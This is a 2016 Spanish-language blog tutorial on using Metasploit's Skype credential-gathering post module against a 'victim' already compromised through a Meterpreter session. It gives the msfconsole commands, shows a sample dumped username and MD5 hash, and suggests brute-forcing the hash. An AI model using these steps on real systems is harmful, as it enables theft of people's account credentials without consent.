sábado, 1 de octubre de 2016

Dump skype account our victim for Metasploit


Saludos fieles lectores a mi humilde blog, siguiendo con el pequeño maratón de los complementos de Metasploit Framework jajaja, lo que haremos ahora sera Dumpear los datos de las cuentas almacenadas de nuestras victimas.




Como ustedes ya saben, necesitamos una Session Meterpreter para conectarnos con nuestra victima y enviar el Exploit remotamente, dejare los siguientes POST donde enseño como hacerlo.

http://www.backtrackomar.com/2015/09/2015-flash-0day-exploit-hackingteam.html
http://www.backtrackomar.com/2015/10/vnc-remote-connection-all-windows.html
http://www.backtrackomar.com/2015/10/beef-browser-exploitation-framework.html
http://www.backtrackomar.com/2015/10/mitm-man-in-middle-ettercap-mitmf-beef.html
http://www.backtrackomar.com/2015/10/unicorn-la-herramienta-de-infeccion.html
http://www.backtrackomar.com/2015/09/explotando-kali-linux-20-cve-2015.html
http://www.backtrackomar.com/2015/10/evadiendo-av-codificando-payloads-con.html
http://www.backtrackomar.com/2015/10/winrar-nuestro-viejo-aliado-de.html
http://www.backtrackomar.com/2015/03/las-viejas-macros-siempre-en-accion.html
http://www.backtrackomar.com/2014/01/aprendiendo-metasploit-avanzado.html

Una ves explotado el sistema de nuestra victima, como vemos en la siguiente imagen:




Añadiremos "Background" para salir de session meterpreter y añadiremos lo siguiente:

--------------------------------------------------------------------------------------------------------------------------
msf exploit(handler) > use post/windows/gather/credentials/skype
msf post(skype) > set SESSION 1
SESSION => 1
msf post(skype) > exploit
--------------------------------------------------------------------------------------------------------------------------

en la sintaxis set SESSION 1, añadí el numero 1 por el simple hecho que es la primera session de conexión que hemos recibido.

Si ustedes desean ver la lista de las sesiones lo pueden hacer  añadiendo el comando sessions -i , pero antes deben salir de la session meterpreter mediante background.
Una ves hecho  todo lo siguiente, le daremos Exploit.









Como vemos nos Dumpeo la cuenta de Skype registrada de nuestra victima:

El USER de la cuenta la oculte por privacidad, pero la contraseña NO, porque vemos que esta en HASH md5.

Ejemplo:

pepito:018347a360343c4d1b88d8e4dfab756a




Dado lo siguiente, usted puede hacer un ataque de fuerza bruta para obtener la contraseña, Saludos fieles lectores.

1 comentario:

  1. o Skype traz muitas facilidades que vão muito além de só conversar online. Hoje em dia é possível fazer vários cursos online. A Preply oferece uma variedade de cursos online, entre eles o de informática por skype https://preply.com/pt/skype/professores--da. A plataforma é séria e o aprendizado garantido.

    ResponderEliminar

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares